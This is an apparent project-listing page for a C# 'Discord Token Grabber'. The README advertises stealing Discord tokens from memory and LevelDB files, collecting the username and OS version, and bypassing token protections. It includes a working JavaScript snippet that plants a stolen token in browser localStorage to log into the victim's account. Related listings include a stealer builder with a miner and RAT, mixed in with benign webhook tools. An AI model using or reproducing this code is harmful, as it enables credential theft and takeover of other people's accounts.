All Projects → ZeroM3m0ry → Discord-Token-Grabber

ZeroM3m0ry / Discord-Token-Grabber

Licence: other
Steal Discord Token Directly From Memory and bypass any kind of token protection

Programming Languages

C#
18002 projects

Projects that are alternatives of or similar to Discord-Token-Grabber

Discord-AIO
Discord AIO (All In One) - discord stealer/token grabber builder with token checks, webhook spammer, obfuscation, encryption, crypto miner, RAT and a lot of extra features.
Stars: ✭ 105 (+228.13%)
Mutual labels:  webhook, token-grabber
Travis Ci Discord Webhook
⛓ Here's your serverless solution for sending build status from Travis CI to Discord as webhooks.
Stars: ✭ 273 (+753.13%)
Mutual labels:  discord, webhook
Skyhook
Parses webhooks and forwards them in the proper format to Discord.
Stars: ✭ 263 (+721.88%)
Mutual labels:  discord, webhook
Discordconsole
Control your Discord & Discord bot accounts and Webhooks through the command line.
Stars: ✭ 58 (+81.25%)
Mutual labels:  discord, webhook
Dhooks
A simple python Discord webhook API wrapper
Stars: ✭ 136 (+325%)
Mutual labels:  discord, webhook
Tradingview Webhook Bot
⚙️ Send TradingView alerts to Telegram, Discord, Slack, Twitter and/or Email.
Stars: ✭ 135 (+321.88%)
Mutual labels:  discord, webhook
Actions Status Discord
Discord Notification Made Easy.
Stars: ✭ 26 (-18.75%)
Mutual labels:  discord, webhook
Aftermath
A simple anti token-grabber, written in Python.
Stars: ✭ 40 (+25%)
Mutual labels:  webhook, token-grabber
Cerberus
A complete Grabber, sending data to a TCP server that you have to host and stocking all in a database.
Stars: ✭ 32 (+0%)
Mutual labels:  webhook, token-grabber
HumbleBundleBot
Scrapes HumbleBundle.com for new Bundles and posts new bundles to different Discord channels or generic webhooks whenever a new Bundle shows up.
Stars: ✭ 41 (+28.13%)
Mutual labels:  webhook
sre.surmon.me
💻 SRE service for Surmon.me blog.
Stars: ✭ 34 (+6.25%)
Mutual labels:  webhook
SlackWebhooksGithubCrawler
Search for Slack Webhooks token publicly exposed on Github
Stars: ✭ 21 (-34.37%)
Mutual labels:  webhook
k8s-vault-webhook
A k8s vault webhook is a Kubernetes webhook that can inject secrets into Kubernetes resources by connecting to multiple secret managers
Stars: ✭ 107 (+234.38%)
Mutual labels:  webhook
gitlab-ci-discord-webhook
⛓ Here's your serverless solution for sending build status from GitLab CI to Discord as webhooks.
Stars: ✭ 32 (+0%)
Mutual labels:  webhook
rabbitmq-vshovel
RabbitMQ vShovel plugin
Stars: ✭ 26 (-18.75%)
Mutual labels:  webhook
DisHook
Discord Webhook Tool Made By EXON
Stars: ✭ 13 (-59.37%)
Mutual labels:  discord
better-discord-notifications
Scripts that send better sonarr/radarr notifications to discord
Stars: ✭ 13 (-59.37%)
Mutual labels:  webhook
rocketchat-gitlab-hook
Add GitLab notifications via a new WebHook in Rocket.Chat
Stars: ✭ 80 (+150%)
Mutual labels:  webhook
pagkibot
Discord bot for instant Twitch live notifications using Twitch's PubSub API.
Stars: ✭ 25 (-21.87%)
Mutual labels:  discord
Aqua-Bot
디스코드 NSFW 챗봇 아쿠아 봇입니다.
Stars: ✭ 13 (-59.37%)
Mutual labels:  discord

Discord-Token-Grabber

Token-Stealer

Features

  • Steal
    • Token directly From memory
    • Token from ldb files
    • username
    • os version
    • bypass any kind of token protection

How to login using token

function login(token) {
setInterval(() => {
document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage.token = `"${token}"`
}, 50);
setTimeout(() => {
location.reload();
}, 2500);
}
  • use login("token"); then refresh the webpage ,and you will login automatically to the account using only token
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].